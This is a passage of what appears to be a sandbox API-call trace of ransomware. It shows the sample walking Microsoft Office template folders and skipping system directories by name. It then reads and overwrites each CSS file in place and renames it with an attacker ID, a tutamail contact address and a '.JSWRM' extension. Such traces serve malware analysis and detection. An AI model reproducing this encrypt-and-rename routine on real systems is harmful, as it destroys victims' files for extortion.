Office\\root\\Office16\\1033\\PUBFTSCM\\SCHEME39.CSS" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubftscm\\scheme39.css"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBFTSCM\\SCHEME39.CSS.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubftscm\\scheme39.css.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0117.943] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471d0 | out: hHeap=0x1e0000) returned 1 [0117.943] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d338 | out: hHeap=0x1e0000) returned 1 [0117.943] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d290 | out: hHeap=0x1e0000) returned 1 [0117.943] FindNextFileW (in: hFindFile=0x232180, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xab7525c, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xab7525c, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xab9b4b8, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1eb4a, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName="SCHEME40.CSS", cAlternateFileName="")) returned 1 [0117.943] lstrcmpiW (lpString1="SCHEME40.CSS", lpString2=".") returned 1 [0117.943] lstrcmpiW (lpString1="SCHEME40.CSS", lpString2="..") returned 1 [0117.943] lstrcmpiW (lpString1="SCHEME40.CSS", lpString2="...") returned 1 [0117.943] lstrcmpiW (lpString1="SCHEME40.CSS", lpString2="windows") returned -1 [0117.943] lstrcmpiW (lpString1="SCHEME40.CSS", lpString2="recovery") returned 1 [0117.943] lstrcmpiW (lpString1="SCHEME40.CSS", lpString2="perflogs") returned 1 [0117.943] lstrcmpiW (lpString1="SCHEME40.CSS", lpString2="documents and settings") returned 1 [0117.943] lstrcmpiW (lpString1="SCHEME40.CSS", lpString2="$RECYCLE.BIN") returned 1 [0117.943] lstrcmpiW (lpString1="SCHEME40.CSS", lpString2="system volume information") returned -1 [0117.943] lstrcmpiW (lpString1="SCHEME40.CSS", lpString2="msocache") returned 1 [0117.944] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0117.944] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SCHEME40.CSS", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0117.944] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SCHEME40.CSS", cchWideChar=12, lpMultiByteStr=0x345e870, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SCHEME40.CSS", lpUsedDefaultChar=0x0) returned 12 [0117.944] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0117.944] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0117.944] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SCHEME40.CSS", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0117.944] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SCHEME40.CSS", cchWideChar=12, lpMultiByteStr=0x345e840, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SCHEME40.CSS", lpUsedDefaultChar=0x0) returned 12 [0117.944] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0117.944] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d530 [0117.944] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d1e8 | out: hHeap=0x1e0000) returned 1 [0117.944] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0117.944] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0117.944] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d140 [0117.944] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBFTSCM\\SCHEME40.CSS" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubftscm\\scheme40.css"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0117.945] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=125770) returned 1 [0117.945] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0117.945] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1eb40) returned 0x24c1d0 [0117.945] ReadFile (in: hFile=0x314, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x1eb40, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e534*=0x1eb40, lpOverlapped=0x0) returned 1 [0117.955] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0117.956] WriteFile (in: hFile=0x314, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x1eb40, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e530*=0x1eb40, lpOverlapped=0x0) returned 1 [0117.956] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0117.956] CloseHandle (hObject=0x314) returned 1 [0117.956] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d290 [0117.956] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0117.956] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0117.956] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0117.956] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0117.956] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0117.956] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0117.956] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a240 [0117.956] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a240, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0117.956] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a240 | out: hHeap=0x1e0000) returned 1 [0117.956] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cd50 [0117.956] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247990 [0117.956] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cd50 | out: hHeap=0x1e0000) returned 1 [0117.956] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0117.956] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBFTSCM\\SCHEME40.CSS" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubftscm\\scheme40.css"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBFTSCM\\SCHEME40.CSS.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubftscm\\scheme40.css.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0117.957] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247990 | out: hHeap=0x1e0000) returned 1 [0117.957] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d290 | out: hHeap=0x1e0000) returned 1 [0117.957] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d140 | out: hHeap=0x1e0000) returned 1 [0117.957] FindNextFileW (in: hFindFile=0x232180, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xaccc88d, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xaccc88d, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xaccc88d, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1e958, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName="SCHEME41.CSS", cAlternateFileName="")) returned 1 [0117.957] lstrcmpiW (lpString1="SCHEME41.CSS", lpString2=".") returned 1 [0117.957] lstrcmpiW (lpString1="SCHEME41.CSS", lpString2="..") returned 1 [0117.958] lstrcmpiW (lpString1="SCHEME41.CSS", lpString2="...") returned 1 [0117.958] lstrcmpiW (lpString1="SCHEME41.CSS", lpString2="windows") returned -1 [0117.958] lstrcmpiW (lpString1="SCHEME41.CSS", lpString2="recovery") returned 1 [0117.958] lstrcmpiW (lpString1="SCHEME41.CSS", lpString2="perflogs") returned 1 [0117.958] lstrcmpiW (lpString1="SCHEME41.CSS", lpString2="documents and settings") returned 1 [0117.958] lstrcmpiW (lpString1="SCHEME41.CSS", lpString2="$RECYCLE.BIN") returned 1 [0117.958] lstrcmpiW (lpString1="SCHEME41.CSS", lpString2="system volume information") returned -1 [0117.958] lstrcmpiW (lpString1="SCHEME41.CSS", lpString2="msocache") returned 1 [0117.958] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0117.958] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SCHEME41.CSS", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0117.958] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SCHEME41.CSS", cchWideChar=12, lpMultiByteStr=0x345e870, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SCHEME41.CSS", lpUsedDefaultChar=0x0) returned 12 [0117.958] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0117.958] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0117.958] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SCHEME41.CSS", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0117.958] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SCHEME41.CSS", cchWideChar=12, lpMultiByteStr=0x345e840, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SCHEME41.CSS", lpUsedDefaultChar=0x0) returned 12 [0117.958] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0117.958] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d290 [0117.958] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d530 | out: hHeap=0x1e0000) returned 1 [0117.958] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0117.958] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0117.958] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23dbc0 [0117.958] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBFTSCM\\SCHEME41.CSS" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubftscm\\scheme41.css"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0117.959] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=125272) returned 1 [0117.959] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0117.959] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1e950) returned 0x24c1d0 [0117.959] ReadFile (in: hFile=0x314, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x1e950, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e534*=0x1e950, lpOverlapped=0x0) returned 1 [0117.968] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0117.968] WriteFile (in: hFile=0x314, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x1e950, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e530*=0x1e950, lpOverlapped=0x0) returned 1 [0117.968] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0117.968] CloseHandle (hObject=0x314) returned 1 [0117.968] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d098 [0117.968] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0117.968] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0117.968] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0117.968] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0117.968] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0117.968] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0117.968] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a270 [0117.968] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a270, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0117.968] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a270 | out: hHeap=0x1e0000) returned 1 [0117.969] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cca8 [0117.969] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2473c0 [0117.969] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cca8 | out: hHeap=0x1e0000) returned 1 [0117.969] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0117.969] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBFTSCM\\SCHEME41.CSS" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubftscm\\scheme41.css"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBFTSCM\\SCHEME41.CSS.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubftscm\\scheme41.css.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0117.970] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2473c0 | out: hHeap=0x1e0000) returned 1 [0117.970] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d098 | out: hHeap=0x1e0000) returned 1 [0117.970] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dbc0 | out: hHeap=0x1e0000) returned 1 [0117.970] FindNextFileW (in: hFindFile=0x232180, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcc7c11d2, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xcc7c11d2, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xcc7c11d2, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x1d920, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName="SCHEME42.CSS", cAlternateFileName="")) returned 1 [0117.970] lstrcmpiW (lpString1="SCHEME42.CSS", lpString2=".") returned 1 [0117.970] lstrcmpiW (lpString1="SCHEME42.CSS", lpString2="..") returned 1 [0117.970] lstrcmpiW (lpString1="SCHEME42.CSS", lpString2="...") returned 1 [0117.970] lstrcmpiW (lpString1="SCHEME42.CSS", lpString2="windows") returned -1 [0117.970] lstrcmpiW (lpString1="SCHEME42.CSS", lpString2="recovery") returned 1 [0117.970] lstrcmpiW (lpString1="SCHEME42.CSS", lpString2="perflogs") returned 1 [0117.970] lstrcmpiW (lpString1="SCHEME42.CSS", lpString2="documents and settings") returned 1 [0117.970] lstrcmpiW (lpString1="SCHEME42.CSS", lpString2="$RECYCLE.BIN") returned 1 [0117.970] lstrcmpiW (lpString1="SCHEME42.CSS", lpString2="system volume information") returned -1 [0117.970] lstrcmpiW (lpString1="SCHEME42.CSS", lpString2="msocache") returned 1 [0117.970] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0117.970] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SCHEME42.CSS", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0117.970] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SCHEME42.CSS", cchWideChar=12, lpMultiByteStr=0x345e870, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SCHEME42.CSS", lpUsedDefaultChar=0x0) returned 12 [0117.970] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0117.970] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0117.970] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SCHEME42.CSS", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0117.970] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SCHEME42.CSS", cchWideChar=12, lpMultiByteStr=0x345e840, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SCHEME42.CSS", lpUsedDefaultChar=0x0) returned 12 [0117.970] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0117.970] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d728 [0117.970] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d290 | out: hHeap=0x1e0000) returned 1 [0117.970] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0117.970] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0117.970] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d9c8 [0117.970] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBFTSCM\\SCHEME42.CSS" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubftscm\\scheme42.css"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0117.971] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=121120) returned 1 [0117.971] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0117.971] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1d920) returned 0x24c1d0 [0117.971] ReadFile (in: hFile=0x314, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x1d920, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e534*=0x1d920, lpOverlapped=0x0) returned 1 [0118.029] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0118.029] WriteFile (in: hFile=0x314, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x1d920, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e530*=0x1d920, lpOverlapped=0x0) returned 1 [0118.030] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0118.030] CloseHandle (hObject=0x314) returned 1 [0118.030] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cff0 [0118.030] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0118.030] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0118.030] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0118.030] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0118.030] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0118.030] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0118.030] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a348 [0118.030] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a348, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0118.030] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a348 | out: hHeap=0x1e0000) returned 1 [0118.030] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cdf8 [0118.030] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2472c8 [0118.030] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cdf8 | out: hHeap=0x1e0000) returned 1 [0118.030] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0118.030] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBFTSCM\\SCHEME42.CSS" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubftscm\\scheme42.css"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBFTSCM\\SCHEME42.CSS.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubftscm\\scheme42.css.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0118.032] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2472c8 | out: hHeap=0x1e0000) returned 1 [0118.032] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cff0 | out: hHeap=0x1e0000) returned 1 [0118.032] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d9c8 | out: hHeap=0x1e0000) returned 1 [0118.032] FindNextFileW (in: hFindFile=0x232180, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xaccc88d, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xaccc88d, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xaccc88d, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1e714, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName="SCHEME43.CSS", cAlternateFileName="")) returned 1 [0118.032] lstrcmpiW (lpString1="SCHEME43.CSS", lpString2=".") returned 1 [0118.032] lstrcmpiW (lpString1="SCHEME43.CSS", lpString2="..") returned 1 [0118.032] lstrcmpiW (lpString1="SCHEME43.CSS", lpString2="...") returned 1 [0118.032] lstrcmpiW (lpString1="SCHEME43.CSS", lpString2="windows") returned -1 [0118.032] lstrcmpiW (lpString1="SCHEME43.CSS", lpString2="recovery") returned 1 [0118.032] lstrcmpiW (lpString1="SCHEME43.CSS", lpString2="perflogs") returned 1 [0118.032] lstrcmpiW 